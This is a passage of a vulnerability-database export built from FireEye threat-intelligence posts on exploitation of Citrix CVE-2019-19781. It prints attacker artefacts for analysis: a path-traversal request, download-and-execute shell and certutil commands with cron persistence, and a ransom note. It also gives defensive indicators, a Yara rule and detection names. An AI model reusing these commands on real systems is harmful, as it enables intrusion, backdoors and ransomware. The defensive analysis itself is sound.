<https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html>\n * <https://github.com/x1sec/x1sec.github.io/blob/master/CVE-2019-19781-DFIR.md>\n * <https://www.us-cert.gov/ncas/alerts/aa20-020a>\n * <https://www.us-cert.gov/ncas/alerts/aa20-031a>\n\n### Acknowledgements\n\nThis vulnerability was reported to the vendor by Mikhail Klyuchnikov of Positive Technologies.\n\nThis document was written by Art Manion and Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2019-19781](<http://web.nvd.nist.gov/vuln/detail/CVE-2019-19781>) \n---|--- \n**Date Public:** | 2019-12-17 \n**Date First Published:** | 2020-01-08 \n**Date Last Updated: ** | 2020-02-03 13:11 UTC \n**Document Revision: ** | 111 \n", "modified": "2020-02-03T13:11:00", "published": "2020-01-08T00:00:00", "id": "VU:619785", "href": "https://www.kb.cert.org/vuls/id/619785", "type": "cert", "title": "Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP web server vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fireeye": [{"lastseen": "2021-05-11T01:30:23", "bulletinFamily": "info", "cvelist": ["CVE-2019-19781"], "description": "As noted in Rough Patch: I Promise It'll Be 200 OK, our [FireEye Mandiant](<https://www.fireeye.com/services.html>) Incident Response team has been hard at work responding to intrusions stemming from the exploitation of CVE-2019-19781. After analyzing dozens of successful exploitation attempts against Citrix ADCs that did not have the [Citrix mitigation steps](<https://support.citrix.com/article/CTX267679> \"https://support.citrix.com/article/CTX267679\" ) implemented, we\u2019ve recognized multiple groups of post-exploitation activity. Within these, something caught our eye: one particular threat actor that\u2019s been deploying a previously-unseen payload for which we\u2019ve created the code family NOTROBIN.\n\nUpon gaining access to a vulnerable NetScaler device, this actor cleans up known malware and deploys NOTROBIN to block subsequent exploitation attempts! But all is not as it seems, as NOTROBIN maintains backdoor access for those who know a secret passphrase. FireEye believes that this actor may be quietly collecting access to NetScaler devices for a subsequent campaign.\n\n#### Initial Compromise\n\nThis actor exploits NetScaler devices using CVE-2019-19781 to execute shell commands on the compromised device. They issue an HTTP POST request from a Tor exit node to transmit the payload to the vulnerable newbm.pl CGI script. For example, Figure 1 shows a web server access log entry recording exploitation:\n\n127.0.0.2 - - [12/Jan/2020:21:55:19 -0500] \"POST \n/vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1\" 304 - \"-\" \"curl/7.67.0\" \n \n--- \n \nFigure 1: Web log showing exploitation\n\nUnlike other actors, this actor appears to exploit devices using a single HTTP POST request that results in an HTTP 304 response\u2014there is no observed HTTP GET to invoke staged commands. Unfortunately, we haven\u2019t recovered the POST body contents to see how it works. In any case, exploitation causes the Bash one liner shown in Figure 2 to run on the compromised system:\n\npkill -9 netscalerd; rm /var/tmp/netscalerd; mkdir /tmp/.init; curl -k \nhxxps://95.179.163[.]186/wp-content/uploads/2018/09/64d4c2d3ee56af4f4ca8171556d50faa -o \n/tmp/.init/httpd; chmod 744 /tmp/.init/httpd; echo \"* * * * * \n/var/nstmp/.nscache/httpd\" | crontab -; /tmp/.init/httpd &amp;\" \n \n--- \n \nFigure 2: Bash exploit payload\n\nThis is the same methodology as described in Rough Patch: I Promise It'll Be 200 OK. The effects of this series of commands includes:\n\n 1. Kill and delete all running instances of netscalerd\u2014a common process name used for cryptocurrency mining utilities deployed to NetScaler devices.\n 2. Creates a hidden staging directory /tmp/.init, download NOTROBIN to it, and enable the execute permission.\n 3. Install /var/nstmp/.nscache/httpd for persistence via the cron daemon. This is the path to which NOTROBIN will copy itself.\n 4. Manually execute NOTROBIN.\n\nThere\u2019s a lot to unpack here. Of note, the actor removes malware known to target NetScaler devices via the CVE-2019-19781 vulnerability. Cryptocurrency miners are generally easy to identify\u2014just look for the process utilizing nearly 100% of the CPU. By uninstalling these unwanted utilities, the actor may hope that administrators overlook an obvious compromise of their NetScaler devices.\n\nThe actor uses curl to fetch NOTROBIN from the hosting server with IP address 95.179.163[.]186 that appears to be an abandoned WordPress site. FireEye has identified many payloads hosted on this server, each named after their embedded authentication key. Interestingly, we haven\u2019t seen reuse of the same payload across multiple clients. Compartmenting payloads indicates the actor is exercising operational security.\n\nFireEye has recovered cron syslog entries, such as those shown in Figure 3, that confirm the persistent installation of NOTROBIN. Note that these entries appear just after the initial compromise. This is a robust indicator of compromise to triage NetScaler devices.\n\nJan 12 21:57:00 &lt;cron.info&gt; foo.netscaler /usr/sbin/cron[73531]: \n(nobody) CMD (/var/nstmp/.nscache/httpd) \n \n--- \n \nFigure 3: cron log entry showing NOTROBIN execution\n\nNow, let\u2019s turn our attention to what NOTROBIN does.\n\n#### Analysis of NOTROBIN\n\nNOTROBIN is a utility written in Go 1.10 and compiled to a 64-bit ELF binary for BSD systems. It periodically scans for and deletes files matching filename patterns and content characteristics. The purpose seems to be to block exploitation attempts against the CVE-2019-19781 vulnerability; however, FireEye believes that NOTROBIN provides backdoor access to the compromised system.\n\nWhen executed, NOTROBIN ensures that it is running from the path /var/nstmp/.nscache/httpd. If not, the utility copies itself to this path, spawns the new copy, and then exits itself. This provides detection cover by migrating the process from /tmp/, a suspicious place for long-running processes to execute, to an apparently NetScaler-related, hidden directory.\n\nNow the fun begins: it spawns two routines that periodically check for and delete exploits.\n\nEvery second, NOTROBIN searches the directory /netscaler/portal/scripts/ for entries created within the last 14 days and deletes them, unless the filename or file content contains a hardcoded key (example: 64d4c2d3ee56af4f4ca8171556d50faa). Open source reporting indicates that some actors write scripts into this directory after exploiting CVE-2019-19781. Therefore, we believe that this routine cleans the system of publicly known payloads, such as [PersonalBookmark.pl](<https://isc.sans.edu/diary/Citrix+ADC+Exploits+are+Public+and+Heavily+Used.+Attempts+to+Install+Backdoor/25700>).\n\nEight times per second, NOTROBIN searches for files with an .xml extension in the directory /netscaler/portal/templates/. This is the directory into which exploits for CVE-2019-19781 write templates containing attacker commands. NOTROBIN deletes files that contain either of the strings block or BLOCK, which likely match potential exploit code, such as that found in the [ProjectZeroIndia exploit](<https://github.com/projectzeroindia/CVE-2019-19781/blob/master/CVE-2019-19781.sh#L20>); however, the utility does not delete files with a filename containing the secret key.\n\nFireEye believes that actors deploy NOTROBIN to block exploitation of the CVE-2019-19781 vulnerability while maintaining backdoor access to compromised NetScaler devices. The mitigation works by deleting staged exploit code found within NetScaler templates before it can be invoked. However, when the actor provides the hardcoded key during subsequent exploitation, NOTROBIN does _not_ remove the payload. This lets the actor regain access to the vulnerable device at a later time.\n\nAcross multiple investigations, FireEye observed actors deploying NOTROBIN with unique keys. For example, we\u2019ve recovered nearly 100 keys from different binaries. These look like MD5 hashes, though FireEye has been unsuccessful in recovering any plaintext. Using complex, unique keys makes it difficult for third parties, such as competing attackers or FireEye, to easily scan for NetScaler devices \u201cprotected\u201d by NOTROBIN. This actor follows a strong password policy!\n\nBased on strings found within NOTROBIN, the actor appears to inject the key into the Go project using source code files named after the key. Figure 4 and Figure 5 show examples of these filenames.\n\n/tmp/b/.tmpl_ci/64d4c2d3ee56af4f4ca8171556d50faa.go \n \n--- \n \nFigure 4: Source filename recovered from NOTROBIN sample\n\n/root/backup/sources/d474a8de77902851f96a3b7aa2dcbb8e.go \n \n--- \n \nFigure 5: Source filename recovered from NOTROBIN sample\n\nWe wonder if \u201ctmpl_ci\u201d refers to a Continuous Integration setup that applies source code templating to inject keys and build NOTROBIN variants. We also hope the actor didn\u2019t have to revert to backups after losing the original source!\n\n#### Outstanding Questions\n\nNOTROBIN spawns a background routine that listens on UDP port 18634 and receives data; however, it drops the data without inspecting it. You can see this logic in Figure 6. FireEye has not uncovered a purpose for this behavior, though DCSO [makes a strong case](<https://blog.dcso.de/a-curious-case-of-cve-2019-19781-palware-remove_bds/>) for this being used as a mutex, as only a single listener can be active on this port.\n\n \nFigure 6: NOTROBIN logic that drops UDP traffic\n\nThere is also an empty function main.install_cron whose implementation has been removed, so alternatively, perhaps these are vestiges of an early version of NOTROBIN. In any case, a NetScaler device listening on UDP port 18634 is a reliable indicator of compromise. Figure 7 shows an example of listing the open file handles on a compromised NetScaler device, including a port listening on UDP 18634.\n\n \nFigure 7: File handling listing of compromised NetScaler device\n\n#### NOTROBIN Efficacy\n\nDuring one engagement, FireEye reviewed forensic evidence of NetScaler exploitation attempts against a single device, both before and after NOTROBIN was deployed by an actor. Prior to January 12, before NOTROBIN was installed, we identified successful attacks from multiple actors. But, across the following three days, more than a dozen exploitation attempts were thwarted by NOTROBIN. In other words, NOTROBIN inoculated the vulnerable device from further compromise. For example, Figure 8 shows a log message that records a failed exploitation attempt.\n\n127.0.0.2 - - [13/Jan/2020:05:09:07 -0500] \"GET \n/vpn/../vpns/portal/wTyaINaDVPaw8rmh.xml HTTP/1.1\" 404 48 \"-\" \n\"curl/7.47.0\" \n \n--- \n \nFigure 8: Web log entry showing a failed exploitation attempt\n\nNote that the application server responded with HTTP 404 (\u201cNot Found\u201d) as this actor attempts to invoke their payload staged in the template wTyaINaDVPaw8rmh.xml. NOTROBIN deleted the malicious template shortly after it was created \u2013 and before it could be used by the other actor.\n\nFireEye has not yet identified if the actor has returned to NOTROBIN backdoors.\n\n#### Conclusion\n\nFireEye believes that the actor behind NOTROBIN has been opportunistically compromising NetScaler devices, possibly to prepare for an upcoming campaign. They remove other known malware, potentially to avoid detection by administrators that check into their devices after reading Citrix security bulletin [CTX267027](<https://support.citrix.com/article/CTX267027>). NOTROBIN mitigates CVE-2019-19781 on compromised devices but retains a backdoor for an actor with a secret key. While we haven\u2019t seen the actor return, we\u2019re skeptical that they will remain a Robin Hood character protecting the internet from the shadows.\n\n#### Indicators of Compromise and Discovery\n\nTable 1 lists indicators that match NOTROBIN variants that FireEye has identified. The domain vilarunners[.]cat is the WordPress site that hosted NOTROBIN payloads. The domain resolved to 95.179.163[.]186 during the time of observed activity. As of January 15, the vilarunners[.]cat domain currently resolves to a new IP address of 80.240.31[.]218.\n\n**IOC Item**\n\n| \n\n**Value** \n \n---|--- \n \nHTTP URL prefix\n\n| \n\nhxxps://95[.]179.163.186/wp-content/uploads/2018/09/ \n \nDirectory\n\n| \n\n/var/nstmp/.nscache \n \nFilename\n\n| \n\n/var/nstmp/.nscache/httpd \n \nDirectory\n\n| \n\n/tmp/.init \n \nFilename\n\n| \n\n/tmp/.init/httpd \n \nCrontab entry\n\n| \n\n/var/nstmp/.nscache/httpd \n \nListening UDP port\n\n| \n\n18634 \n \nRemote IP\n\n| \n\n95.179.163[.]186 \n \nRemote IP\n\n| \n\n80.240.31[.]218 \n \nDomain\n\n| \n\nvilarunners[.]cat \n \nTable 1: Indicators of Compromise\n\n#### Discovery on VirusTotal\n\nYou can use the following VTI queries to identify NOTROBIN variants on VirusTotal:\n\n * vhash:\"73cee1e8e1c3265c8f836516c53ae042\"\n * vhash:\"e57a7713cdf89a2f72c6526549d22987\"\n\nNote, the vHash implementation is private, so we\u2019re not able to confirm why this technique works. In practice, the vHashes cover the same variants identified by the Yara rule listed in Figure 9.\n\nrule NOTROBIN\n\n{\n\nmeta:\n\nauthor = \"william.ballenthin@fireeye.com\"\n\ndate_created = \"2020-01-15\"\n\nstrings:\n\n$func_name_1 = \"main.remove_bds\"\n\n$func_name_2 = \"main.xrun\"\n\ncondition:\n\nall of them\n\n} \n \n--- \n \nFigure 9: Yara rule that matches on NOTROBIN variants\n\n#### Recovered Authentication Keys\n\nFireEye has identified nearly 100 hardcoded keys from NOTROBIN variants that the actor could use to re-enter compromised environments. We expect that these strings may be found within subsequent exploitation attempts, either as filenames or payload content. Although we won\u2019t publish them here out of concern for our customers, please reach out if you\u2019re looking for NOTROBIN within your environment and we can provide a list.\n\n#### Acknowledgements\n\nThank you to analysts across FireEye that are currently responding to this activity, including [Brandan Schondorfer](<https://twitter.com/4real_br4nd4n>) for collecting and interpreting artifacts, [Steven Miller](<https://twitter.com/stvemillertime>) for coordinating analysis, [Evan Reese](<https://twitter.com/reesespcres>) for pivoting across intel leads, [Chris Glyer](<https://twitter.com/cglyer>) for reviewing technical aspects, [Moritz Raabe](<https://twitter.com/m_r_tz>) for reverse engineering NOTROBIN samples, and [Ashley Frazer](<https://twitter.com/HighViscosity>) for refining the presentation and conclusions.\n", "modified": "2020-01-16T03:00:00", "published": "2020-01-16T03:00:00", "id": "FIREEYE:2FBC6EAA2BC98E48BDE41A39FB730AA1", "href": "https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html", "type": "fireeye", "title": "404 Exploit Not Found: Vigilante Deploying Mitigation for Citrix\nNetScaler Vulnerability While Maintaining Backdoor", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-05-11T01:30:23", "bulletinFamily": "info", "cvelist": ["CVE-2019-19781"], "description": "#### An Ever-Evolving Threat\n\nSince January 10, 2020, FireEye has tracked extensive global exploitation of CVE-2019-19781, which continues to impact Citrix ADC and Gateway [instances that are unpatched](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>) or do not have [mitigations applied](<https://support.citrix.com/article/CTX267679>). We previously reported on attackers\u2019 swift attempts to exploit this vulnerability and the post-compromise deployment of the previously unseen NOTROBIN malware family by one threat actor. FireEye continues to actively track multiple clusters of activity associated with exploitation of this vulnerability, primarily based on how attackers interact with vulnerable Citrix ADC and Gateway instances after identification.\n\nWhile most of the CVE-2019-19781 exploitation activity we\u2019ve observed to this point has led to the deployment of coin miners or most commonly NOTROBIN, recent compromises suggest that this vulnerability is also being exploited to deploy ransomware. If your organization is attempting to assess whether there is evidence of compromise related to exploitation of CVE-2019-19781, we highly encourage you to use the IOC Scanner co-published by FireEye and Citrix, which detects the activity described in this post.\n\nBetween January 16 and 17, 2020, FireEye [Managed Defense](<https://www.fireeye.com/solutions/managed-defense.html>) detected the IP address 45[.]120[.]53[.]214 attempting to exploit CVE-2019-19781 at dozens of FireEye clients. When successfully exploited, we observed impacted systems executing the cURL command to download a shell script with the file name ld.sh from 45[.]120[.]53[.]214 (Figure 1). In some cases this same shell script was instead downloaded from hxxp://198.44.227[.]126:81/citrix/ld.sh.\n\n \nFigure 1: Snippet of ld.sh, downloaded from 45.120.53.214\n\nThe shell script, provided in Figure 2, searches for the python2 binary (Note: Python is only pre-installed on Citrix Gateway 12.x and 13.x systems) and downloads two additional files to the system: piz.Lan, a XOR-encoded data blob, and de.py, a Python script, to a temporary directory. This script then changes permissions and executes de.py, which subsequently decodes and decompresses piz.Lan. Finally, the script cleans up the initial staging files and executes scan.py, an additional script we will cover in more detail later in the post.\n\n#!/bin/sh \nrm $0 \nif [ ! -f \"/var/python/bin/python2\" ]; then \necho 'Exit' \nexit \nfi\n\nmkdir /tmp/rAgn \ncd /tmp/rAgn\n\ncurl hxxp://45[.]120[.]53[.]214/piz.Lan -o piz.Lan \nsleep 1 \ncurl hxxp://45[.]120[.]53[.]214/de -o de.py \nchmod 777 de.py \n/var/python/bin/python2 de.py\n\nrm de.py \nrm piz.Lan \nrm .new.zip \ncd httpd \n/var/python/bin/python2 scan.py -n 50 -N 40 &amp; \n \n--- \n \nFigure 2: Contents of ld.sh, a shell-script to download additional tools to the compromised system\n\n#### piz.Lan -&gt; .net.zip\n\nArmed with the information gathered from de.py, we turned our attention to decoding and decompressing \u201c.net.zip\u201d (MD5: 0caf9be8fd7ba5b605b7a7b315ef17a0). Inside, we recovered five files, represented in Table 1:\n\n**Filename**\n\n| \n\n**Functionality**\n\n| \n\n**MD5** \n \n---|---|--- \n \nx86.dll\n\n| \n\n32-bit Downloader\n\n| \n\n9aa67d856e584b4eefc4791d2634476a \n \nx64.dll\n\n| \n\n64-bit Downloader\n\n| \n\n55b40e0068429fbbb16f2113d6842ed2 \n \nscan.py\n\n| \n\nPython socket scanner\n\n| \n\nb0acb27273563a5a2a5f71165606808c \n \nxp_eternalblue.replay\n\n| \n\nExploit replay file\n\n| \n\n6cf1857e569432fcfc8e506c8b0db635 \n \neternalblue.replay\n\n| \n\nExploit replay file\n\n| \n\n9e408d947ceba27259e2a9a5c71a75a8 \n \nTable 1: Contents of the ZIP file \".new.zip\", created by the script de.py\n\nThe contents of the ZIP were explained via analysis of the file scan.py, a Python scanning script that would also automate exploitation of identified vulnerable system(s). Our initial analysis showed that this script was a combination of functions from multiple open source projects or scripts. As one example, the replay files, which were either adapted or copied directly from this [public](<https://github.com/pythonone/MS17-010/tree/master/exploits/eternalblue>) GitHub repository, were present in the Install_Backdoor function, as shown in Figure 3:\n\n \nFigure 3: Snippet of scan.py showing usage of EternalBlue replay files\n\nThis script also had multiple functions checking whether an identified system is 32- vs. 64-bit, as well as raw shell code to step through an exploit. The exploit_main function, when called, would appropriately choose between 32- or 64-bit and select the right DLL for injection, as shown in Figure 4.\n\n \nFigure 4: Snippet of scan.py showing instructions to deploy 32- or 64-bit downloaders\n\n#### I Call Myself Ragnarok\n\nOur analysis continued by examining the capabilities of the 32- and 64-bit DLLs, aptly named x86.dll and x64.dll. At only 5,120 bytes each, these binaries performed the following tasks (Figure 5 and Figure 6):\n\n 1. Download a file named patch32 or patch64 (respective to operating system bit-ness) from a hard-coded URL using certutil, a native tool used as part of Windows Certificate Services (categorized as Technique 11005 within [MITRE\u2019s ATT&amp;CK framework](<https://attack.mitre.org/techniques/T1105/>)).\n 2. Execute the downloaded binary since1969.exe, located in C:\\Users\\Public.\n 3. Delete the URL from the current user\u2019s certificate cache.\ncertutil.exe -urlcache -split -f hxxp://45.120.53[.]214/patch32 C:/Users/Public/since1969.exe \ncmd.exe /c C:/Users/Public/since1969.exe \ncertutil -urlcache -f hxxp://45.120.53[.]214/patch32 delete \n--- \n \nFigure 5: Snippet of strings from x86.dll\n\ncertutil.exe -urlcache -split -f hxxp://45.120.53[.]214/patch64 C:/Users/Public/since1969.exe \ncmd.exe /c C:/Users/Public/since1969.exe \ncertutil -urlcache -f hxxp://45.120.53[.]214/patch64 delete \n--- \n \nFigure 6: Snippet of strings from x64.dll\n\nAlthough neither patch32 nor patch64 were available at the time of analysis, FireEye identified a file on VirusTotal with the name avpass.exe (MD5: e345c861058a18510e7c4bb616e3fd9f) linked to the IP address 45[.]120[.]53[.]214 (Figure 8). This file is an instance of the [publicly available Meterpreter backdoor](<https://www.virustotal.com/gui/file/813414cbdaa738393561ebae0778f17e2810ff39592a0e731b654f33805fd644/detection>) that was uploaded on November 12, 2019. Additional analysis confirmed that this binary communicated to 45[.]120[.]53[.]214 over TCP port 1234.\n\n \nFigure 7: VirusTotal graph showing links between resources hosted on or communicating with 45.120.53.214\n\nWithin the avpass.exe binary, we found an interesting PDB string that provided more context about the tool\u2019s author: \u201cC:\\Users\\ragnarok\\source\\repos\\avpass\\Debug\\avpass.pdb\u201d. Utilizing ragnarok as a keyword, we pivoted and were able to identify a separate copy of since1969.exe (MD5: 48452dd2506831d0b340e45b08799623) uploaded to VirusTotal on January 23, 2020. The binary\u2019s compilation timestamp of January 16, 2020, aligns with our earliest detections associated with this threat actor.\n\nFurther analysis and sandboxing of this binary brought all the pieces together\u2014this threat actor may have been attempting to deploy ransomware aptly named \u2018Ragnarok\u2019. We\u2019d like to give credit to [this Tweet](<https://twitter.com/struppigel/status/1218188275657166849>) from Karsten Hahn, who identified ragnarok-related about artifacts on January 17, 2020, again aligning with the timeframe of our initial detection. Figure 8 provides a snippet of files created by the binary upon execution.\n\n \nFigure 8: Ragnarok-related ransomware files\n\nThe ransom note dropped by this ransomware, shown in Figure 11, points to three email addresses.\n\n6.it's wise to pay as soon as possible it wont make you more losses\n\nthe ransome: 1 btcoin for per machine,5 bitcoins for all machines\n\nhow to buy bitcoin and transfer? i think you are very good at googlesearch\n\nasgardmaster5@protonmail[.]com \nragnar0k@ctemplar[.]com \nj.jasonm@yandex[.]com\n\nAttention:if you wont pay the ransom in five days, all of your files will be made public on internet and will be deleted \n \n--- \n \nFigure 9: Snippet of ransom note dropped by \u201csince1969.exe\u201d\n\n#### Implications\n\nFireEye continues to observe multiple actors who are currently seeking to take advantage of CVE-2019-19781. This post outlines one threat actor who is using multiple exploits to take advantage of vulnerable internal systems and move laterally inside the organization. Based on our initial observations, the ultimate intent may have been the deployment of ransomware, using the Gateway as a central pivot point.\n\nAs previously mentioned, if suspect your Citrix appliances may have been compromised, we recommend utilizing the [tool FireEye released in partnership with Citrix](<https://github.com/fireeye/ioc-scanner-CVE-2019-19781/releases/tag/v1.0>).\n\n#### Detect the Technique\n\nAside from CVE-2019-19781, FireEye detects the activity described in this post across our platforms, including named detections for Meterpreter, and EternalBlue. Table 2 contains several specific detection names to assist in detection of this activity.\n\n**Signature Name** \n \n--- \n \nCERTUTIL.EXE DOWNLOADER (UTILITY) \n \nCURL Downloading Shell Script \n \nETERNALBLUE EXPLOIT \n \nMETERPRETER (Backdoor) \n \nMETERPRETER URI (STAGER) \n \nSMB - ETERNALBLUE \n \nTable 2: FireEye Detections for activity described in this post\n\n#### Indicators\n\nTable 3 provides the unique indicators discussed in this post.\n\n**Indicator Type**\n\n| \n\n**Indicator**\n\n| \n\n**Notes** \n \n---|---|--- \n \nNetwork\n\n| \n\n45[.]120[.]53[.]214\n\n| \n \nNetwork\n\n| \n\n198[.]44[.]227[.]126\n\n| \n \nHost\n\n| \n\n91dd06f49b09a2242d4085703599b7a7\n\n| \n\npiz.Lan \n \nHost\n\n| \n\n01af5ad23a282d0fd40597c1024307ca\n\n| \n\nde.py \n \nHost\n\n| \n\nbd977d9d2b68dd9b12a3878edd192319\n\n| \n\nld.sh \n \nHost\n\n| \n\n0caf9be8fd7ba5b605b7a7b315ef17a0\n\n| \n\n.new.zip \n \nHost\n\n| \n\n9aa67d856e584b4eefc4791d2634476a\n\n| \n\nx86.dll \n \nHost\n\n| \n\n55b40e0068429fbbb16f2113d6842ed2\n\n| \n\nx64.dll \n \nHost\n\n| \n\nb0acb27273563a5a2a5f71165606808c\n\n| \n\nscan.py \n \nHost\n\n| \n\n6cf1857e569432fcfc8e506c8b0db635\n\n| \n\nxp_eternalblue.replay \n \nHost\n\n| \n\n9e408d947ceba27259e2a9a5c71a75a8\n\n| \n\neternalblue.replay \n \nHost\n\n| \n\ne345c861058a18510e7c4bb616e3fd9f\n\n| \n\navpass.exe \n \nHost\n\n| \n\n48452dd2506831d0b340e45b08799623\n\n| \n\nsince1969.exe \n \nEmail Address\n\n| \n\nasgardmaster5@protonmail[.]com\n\n| \n\nFrom ransom note \n \nEmail Address\n\n| \n\nragnar0k@ctemplar[.]com\n\n| \n\nFrom ransom note \n \nEmail Address\n\n| \n\nj.jasonm@yandex[.]com\n\n| \n\nFrom ransom note \n \nTable 3: Collection of IOCs from this blog post\n", "modified": "2020-01-24T17:00:00", "published": "2020-01-24T17:00:00", "id": "FIREEYE:27339B4646A838356BA1378430516613", "href": "https://www.fireeye.com/blog/threat-research/2020/01/nice-try-501-ransomware-not-implemented.html", "type": "fireeye", "title": "Nice Try: 501 (Ransomware) Not Implemented", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-23T01:38:37", "bulletinFamily": "info", "cvelist": ["CVE-2012-0158", "CVE-2019-12650", "CVE-2019-19781"], "description": "_One of the critical strategic and tactical roles that cyber threat intelligence (CTI) plays is in the tracking, analysis, and prioritization of software vulnerabilities that could potentially put an organization\u2019s data, employees and customers at risk. In this four-part blog series, FireEye Mandiant Threat Intelligence highlights the value of CTI in enabling vulnerability management, and unveils new research into the latest threats, trends and recommendations._\n\nOrganizations often have to make difficult choices when it comes to patch prioritization. Many are faced with securing complex network infrastructure with thousands of systems, different operating systems, and disparate geographical locations. Even when armed with a simplified vulnerability rating system, it can be hard to know where to start. This problem is compounded by the ever-changing threat landscape and increased access to zero-days.\n\nAt FireEye, we apply the rich body of knowledge accumulated over years of global intelligence collection, incident response investigations, and device detections, to help our customers defend their networks. This understanding helps us to discern between hundreds of newly disclosed vulnerabilities to provide ratings and assessments that empower network defenders to focus on the most significant threats and effectively mitigate risk to their organizations. \n\nIn this blog post, we\u2019ll demonstrate how we apply intelligence to help organizations assess risk and make informed decisions about vulnerability management and patching in their environments.\n\n#### Functions of Vulnerability Intelligence\n\nVulnerability intelligence helps clients to protect their organizations, assets, and users in three main ways:\n\n \nFigure 1: Vulnerability intelligence can help with risk assessment and informed decision making\n\n#### Tailoring Vulnerability Prioritization\n\nWe believe it is important for organizations to build a defensive strategy that prioritizes the types of threats that are most likely to impact their environment, and the threats that could cause the most damage. When organizations have a clear picture of the spectrum of threat actors, malware families, campaigns, and tactics that are most relevant to their organization, they can make more nuanced prioritization decisions when those threats are linked to exploitation of vulnerabilities. A lower risk vulnerability that is actively being exploited in the wild against your organization or similar organizations likely has a greater potential impact to you than a vulnerability with a higher rating that is not actively being exploited.\n\n \nFigure 2: Patch Prioritization Philosophy\n\n#### Integration of Vulnerability Intelligence in Internal Workflows\n\nBased on our experience assisting organizations globally with enacting intelligence-led security, we outline three use cases for integrating vulnerability intelligence into internal workflows.\n\n \nFigure 3: Integration of vulnerability intelligence into internal workflows\n\n**Tools and Use Cases for Operationalizing Vulnerability Intelligence**\n\n_1\\. Automate Processes by Fusing Intelligence with Internal Data_\n\nAutomation is valuable to security teams with limited resources. Similar to automated detecting and blocking of indicator data, vulnerability threat intelligence can be automated by merging data from internal vulnerability scans with threat intelligence (via systems like the Mandiant [Intelligence API](<https://www.fireeye.com/solutions/cyber-threat-intelligence/threat-intelligence-subscriptions/intelligence-api.html>)) and aggregated into a SIEM, Threat Intelligence Platform, and/or ticketing system. This enhances visibility into various sources of both internal and external data with vulnerability intelligence providing risk ratings and indicating which vulnerabilities are being actively exploited. FireEye also offers a custom tool called FireEye Intelligence Vulnerability Explorer (\u201cFIVE\u201d), described in more detail below for quickly correlating vulnerabilities found in logs and scans with Mandiant ratings.\n\nSecurity teams can similarly automate communication and workflow tracking processes using threat intelligence by defining rules for auto-generating tickets based on certain combinations of Mandiant risk and exploitation ratings; for example, internal service-level-agreements (SLAs) could state that \u2018high\u2019 risk vulnerabilities that have an exploitation rating of \u2018available,\u2019 \u2018confirmed,\u2019 or \u2018wide\u2019 must be patched within a set number of days. Of course, the SLA will depend on the company\u2019s operational needs, the capability of the team that is advising the patch process, and executive buy-in to the SLA process. Similarly, there may be an SLA defined for patching vulnerabilities that are of a certain age. Threat intelligence tells us that adversaries continue to use older vulnerabilities as long as they remain effective. For example, as recently as January 2020, we observed a Chinese cyber espionage group use an exploit for CVE-2012-0158, a Microsoft Office stack-based buffer overflow vulnerability originally released in 2012, in malicious email attachments to target organizations in Southeast Asia. Automating the vulnerability-scan-to-vulnerability-intelligence correlation process can help bring this type of issue to light. \n\nAnother potential use case employing automation would be incorporating vulnerability intelligence as security teams are testing updates or new hardware and software prior to introduction into the production environment. This could dramatically reduce the number of vulnerabilities that need to be patched in production and help prioritize those vulnerabilities that need to be patched first based on your organization\u2019s unique threat profile and business operations.\n\n_2\\. Communicating with Internal Stakeholders_\n\nTeams can leverage vulnerability reporting to send internal messaging, such as flash-style notifications, to alert other teams when Mandiant rates a vulnerability known to impact your systems high or critical. These are the vulnerabilities that should take priority in patching and should be patched outside of the regular cycle.\n\nData-informed intelligence analysis may help convince stakeholders outside of the security organization the importance of patching quickly, even when this is inconvenient to business operations. Threat Intelligence can inform an organization\u2019s appropriate use of resources for security given the potential business impact of security incidents.\n\n_3\\. Threat Modeling_\n\nOrganizations can leverage vulnerability threat intelligence to inform their threat modeling to gain insight into the most likely threats to their organization, and better prepare to address threats in the mid to long term. Knowledge of which adversaries pose the greatest threat to your organization, and then knowledge of which vulnerabilities those threat groups are exploiting in their operations, can enable your organization to build out security controls and monitoring based on those specific CVEs.\n\n#### Examples\n\nThe following examples illustrate workflows supported by vulnerability threat intelligence to demonstrate how organizations can operationalize threat intelligence in their existing security teams to automate processes and increase efficiency given limited resources.\n\n_Example 1: Using FIVE for Ad-hoc Vulnerability Prioritization_\n\nThe FireEye Intelligence Vulnerability Explorer (\u201cFIVE\u201d) tool is available for customers [here](<https://fireeye.market/apps?query=five>). It is available for MacOS and Windows, requires a valid subscription for Mandiant Vulnerability Intelligence, and is driven from an API integration.\n\n \nFigure 4: FIVE Tool for Windows and MacOS\n\nIn this scenario, an organization\u2019s intelligence team was asked to quickly identify any vulnerability that required patching from a server vulnerability scan after that server was rebuilt from a backup image. The intelligence team was presented with a text file containing a list of CVE numbers. Users can drag-and-drop a text readable file (CSV, TEXT, JSON, etc.) into the FIVE tool and the CVE numbers will be discovered from the file using regex. As shown in Figure 6 (below), in this example, the following vulnerabilities were found in the file and presented to the user. \n\n \nFigure 5: FIVE tool startup screen waiting for file input\n\n \nFigure 6: FIVE tool after successfully regexing the CVE-IDs from the file\n\nAfter selecting all CVE-IDs, the user clicked the \u201cFetch Vulnerabilities\u201d button, causing the application to make the necessary two-stage API call to the Intelligence API.\n\nThe output depicted in Figure 7 shows the user which vulnerabilities should be prioritized based on FireEye\u2019s risk and exploitation ratings. The red and maroon boxes indicate vulnerabilities that require attention, while the yellow indicate vulnerabilities that should be reviewed for possible action. Details of the vulnerabilities are displayed below, with associated intelligence report links providing further context.\n\n \nFigure 7: FIVE tool with meta-data, CVE-IDs, and links to related Intelligence Reports\n\nFIVE can also facilitate other use cases for vulnerability intelligence. For example, this chart can be attached in messaging to other internal stakeholders or executives for review, as part of a status update to provide visibility on the organization\u2019s vulnerability management program.\n\n_Example 2: Vulnerability Prioritization, Internal Communications, Threat Modeling_\n\nCVE-2019-19781 is a vulnerability affecting Citrix that Mandiant Threat Intelligence rated critical. Mandiant discussed early exploitation of this vulnerability in a January 2020 blog post. We continued to monitor for additional exploitation, and informed our clients 